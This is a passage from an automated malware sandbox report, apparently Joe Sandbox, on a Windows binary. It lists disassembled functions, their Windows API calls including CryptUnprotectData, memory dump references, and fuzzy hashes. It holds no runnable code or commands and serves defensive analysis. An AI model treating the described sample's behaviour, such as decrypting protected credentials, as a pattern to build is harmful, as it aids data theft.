                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                                        • Instruction ID: bf62f43a8b33909047004289ecbc0b29d25ce35526e74752f5d2cabb5f2ebb10
                                        • Opcode Fuzzy Hash: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                                        • Instruction Fuzzy Hash: 2B112AB2904218ABCB14DFC9DD45BBEB7F8FB4CB12F10425AF605B2280E6395940CBB1
                                        Function 00927A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006BDE88,00000000,?,00930E10,00000000,?,00000000,00000000), ref: 00927A63
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006BDE88,00000000,?,00930E10,00000000,?,00000000,00000000,?), ref: 00927A7D
                                        • wsprintfA.USER32 ref: 00927AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                                        • Instruction ID: e5e9789e9c60891d235cde276638f82a3d24814ee74d464e8623af2d88173c65
                                        • Opcode Fuzzy Hash: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                                        • Instruction Fuzzy Hash: 051152B1945228EBDB108B54EC59F69B778F744721F1047D5E516A32C0D7745A40CF51
                                        Function 00923720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(0092E118,00000000,00000001,0092E108,00000000), ref: 00923758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009237B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                                        • Instruction ID: d0598a9dbb3e7f1d310abdbb3cee1b6fa1b49463ef78983d0ce42c192c8ceb7a
                                        • Opcode Fuzzy Hash: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                                        • Instruction Fuzzy Hash: 8D410971A00A289FDB24DF58DC94B9BB7B4BB48702F4081D8E608EB2D0E7716E85CF50
                                        Function 00919B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                                        • LocalFree.KERNEL32(?), ref: 00919BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: e5958cf1a30831096a56c4834f5afffbed96ca54a6c2539a6f685c1a9c93c90f
                                        • Instruction ID: 11ce3e0611f22e1d11c41a114c3ae6ea4747eb15e2b5fc502ad1b52e6023acf2
                                        • Opcode Fuzzy Hash: e5958cf1a30831096a56c4834f5afffbed96ca54a6c2539a6f685c1a9c93c90f
                                        • Instruction Fuzzy Hash: 4011CCB4A00209DFDB04DF94D985AAE77B9FF88301F104598E915A7350D774AE50CF61
                                        Function 00CE818B Relevance: 4.1, Strings: 2, Instructions: 1585COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: `za($}
                                        • API String ID: 0-2207082840
                                        • Opcode ID: fc21e6bcce5a687dbe64f30c91726ba6a93bf755d4269c00dd824ebb66d1b81a
                                        • Instruction ID: 97a87cf6f71500fc863f60f3cfb563e6430838f2dcba5bb679b8776729ac8642
                                        • Opcode Fuzzy Hash: fc21e6bcce5a687dbe64f30c91726ba6a93bf755d4269c00dd824ebb66d1b81a
                                        • Instruction Fuzzy Hash: 8CB2E6F3A0C204AFE7046E2DEC8567ABBEAEFD4720F16453DE6C483744EA3558058697
                                        Function 00CD63EB Relevance: 3.3, Strings: 2, Instructions: 793COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 4]%F$rV}=
                                        • API String ID: 0-1087136854
                                        • Opcode ID: 5ba433a9dd4fd2a1f78207b7b7c8ee28ee2301cecca48a0a90ed3b3c8c170d4a
                                        • Instruction ID: 50980f5828afefefa7cc211c32328d3cd0136228c0cbd66c4cc6bda19dfbd658
                                        • Opcode Fuzzy Hash: 5ba433a9dd4fd2a1f78207b7b7c8ee28ee2301cecca48a0a90ed3b3c8c170d4a
                                        • Instruction Fuzzy Hash: BA4226F390C3049FE3086F2DED8567ABBE5EF94720F1A852DEAC483744EA3559148687
                                        Function 00BA7A65 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 7u$;Q}
                                        • API String ID: 0-1245395536
                                        • Opcode ID: 961c91a212692104a1bece4dd87720c892268544114cc833af9ca9776b9e4c75
                                        • Instruction ID: 0e82931bb981db10e53b1861cec83e57b251a771f16fd51ffb2017b716ce320f
                                        • Opcode Fuzzy Hash: 961c91a212692104a1bece4dd87720c892268544114cc833af9ca9776b9e4c75
                                        • Instruction Fuzzy Hash: 536116F3B096005BF3045E39DC9533AB6D7EBD8314F2B863DE68887384E93948054682
                                        Function 00C36937 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: W.?g$|2?}
                                        • API String ID: 0-321987215
                                        • Opcode ID: 7705ac6814ba657c8501914f3a252e0a3bcf1fe4aff4018bd2bbb9bdc0347011
                                        • Instruction ID: 381c76d2a3e7436de300dd28fc9092487c598e3c14242b4603b8d8e9a3285f79
                                        • Opcode Fuzzy Hash: 7705ac6814ba657c8501914f3a252e0a3bcf1fe4aff4018bd2bbb9bdc0347011
                                        • Instruction Fuzzy Hash: 9451B1F39086109FE314BE29DC4576AFBE5EF98720F17893DD6D893290E63548448B93
                                        Function 00C51E09 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: al_]
                                        • API String ID: 0-3421114860
                                        • Opcode ID: be0c04fdc38ce49e647d7057b9e53c5fcb8e34eaa5ab731fecb11b77cfd31ef3
                                        • Instruction ID: deafe034ca6da301db84a893999b79b25a64001310dec1d220a5adb7994564ef
                                        • Opcode Fuzzy Hash: be0c04fdc38ce49e647d7057b9e53c5fcb8e34eaa5ab731fecb11b77cfd31ef3
                                        • Instruction Fuzzy Hash: 503135B3E483048BF3409E2DDC8535ABAD99F94720F2B853DD9D8D7B80E9789C058752
                                        Function 00CDD032 Relevance: .6, Instructions: 590COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8003850ef594d19525a6fcec00aec3248d50e8e2edeb43e056f24ae72f2f048d
                                        • Instruction ID: 6bfb296ca2cd51d68a92e94a577099086b7b8ae9dcbc922cb818f58141502c9e
                                        • Opcode Fuzzy Hash: 8003850ef594d19525a6fcec00aec3248d50e8e2edeb43e056f24ae72f2f048d
                                        • Instruction Fuzzy Hash: EB02E8F360C204AFE3146E29EC8577AB7E9EFD4720F1A493DEAC4C3744E97598018696
                                        Function 00C07C35 Relevance: .2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23ad3c9d6c4881427713ba61c3a120bae78b77c1539aea6910500ba8bd70aa3b
                                        • Instruction ID: 91ac290a9d18a9fe45f875914236f828340eb5064241dc13e8f90366b0e75f40
                                        • Opcode Fuzzy Hash: 23ad3c9d6c4881427713ba61c3a120bae78b77c1539aea6910500ba8bd70aa3b
                                        • Instruction Fuzzy Hash: F1518CF3A081145FE714692DDC5573ABBD6EBD0320F2A823DDB96977C4E978080582C6
                                        Function 00D83A55 Relevance: .2, Instructions: 176COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
